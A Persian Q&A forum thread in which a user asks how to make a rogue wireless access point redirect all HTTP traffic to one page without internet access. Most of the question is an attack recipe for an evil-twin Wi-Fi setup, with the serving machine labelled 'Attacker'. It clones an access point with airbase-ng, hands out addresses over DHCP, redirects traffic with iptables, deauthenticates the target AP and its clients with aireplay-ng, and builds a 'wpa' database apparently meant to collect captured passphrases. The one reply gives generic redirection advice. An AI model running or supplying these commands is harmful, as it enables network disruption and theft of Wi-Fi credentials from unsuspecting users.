با ثبت نام در سایت از مزایای اعضا بهره مند شوید!

راه اندازی apache2 server روی یک اینترفیس وایرلس با تنظیمات DHCP-server و iptables

+1 امتیاز
110 بازدید
سوال شده مهر 9, 1395 در شبکه و سرویس‌ دهنده‌ها توسط overboy (9 امتیاز)
با سلام ... من قصد دارم یک wireless access ponit ایجاد کنم که کسانی که به این اکسس پوینت متصل میشوند با تایپ هر آدرسی در پروتکل HTTP به یک صفحه خاص هدایت شوند . آیا بدون داشتن اینترنت میتوانم این کار را انجام دهم ؟ (به چه صورت)

برنامه زیر با استفاده از اینترنت روی سرویس دهنده (Attacker) به خوبی کار میکند و عملیاتی است ! اما بدون داشتن اینتذنت کانکشن راه حلی به ذهن بنده نمیرسد اگر ممکن است راهنمایی بفرمایید

Commands:

Install dhcp3 and create config file:

apt-get install dhcp3-server -y

mv /etc/dhcp3/dhcpd.conf /etc/dhcp3/dhcpd.conf.backup

kwrite /etc/dhcp3/dhcpd.conf

/etc/dhcp3/dhcpd.conf:

ddns-update-style ad-hoc;

default-lease-time 600;

max-lease-time 7200;

subnet 192.168.2.128 netmask 255.255.255.128 {

option subnet-mask 255.255.255.128;

option broadcast-address 192.168.2.255;

option routers 192.168.2.129;

option domain-name-servers 8.8.8.8;

range 192.168.2.130 192.168.2.140;

}

Start clone access point:

airmon-ng start wlan0 [channel]

airbase-ng -e "AP name" -c [channel] mon0

ifconfig at0 up

ifconfig at0 192.168.2.129 netmask 255.255.255.128

route add -net 192.168.2.128 netmask 255.255.255.128 gw 192.168.2.129

dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0

/etc/init.d/dhcp3-server start

Flush iptables:

iptables --flush

iptables --table nat --flush

iptables --delete-chain

iptables --table nat --delete-chain

iptables --table nat --append POSTROUTING --out-interface [internet connection] -j MASQUERADE

iptables --append FORWARD --in-interface at0 -j ACCEPT

echo 1 > /proc/sys/net/ipv4/ip_forward

Redirect traffic:

iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination IP address

iptables -t nat -A POSTROUTING -j MASQUERADE

DeAuthenticate Access Point (poor):

aireplay-ng -0 0 -a [target bssid] [monitor interface]

DeAuthenticate Client (recommended):

aireplay-ng -0 0 -a [target bssid] -c [client mac] [monitor interface]

Database

mysql -u root -p

create database wpa;

use wpa;

create table content(key1 VARCHAR(64), key2 VARCHAR(64));

1 پاسخ

0 امتیاز
پاسخ داده شده مهر 9, 1395 توسط GreatBahram (155 امتیاز)
شما دو کار میتونی بکنی اولی اینه که با برنامه iptables یک روتینگ تعریف کنی که هر کسی خواست بره به این آی پی منتقلش کن به این آی پی یا اینکه اگه صرفا سایت منظورتونه می تونید با نصب آپاچی که واسه وب سرور اون هاست رو توی وب سرور خودتون بسازید حالا هرکی اون سایت رو بزنه در حقیقت وارد سایتی که روی وب سرور شماست بالا میاد واسش
سرور مجازی لینوکس

2,195 سوال

35,816 پاسخ

4,202 دیدگاه

9,388 کاربر

...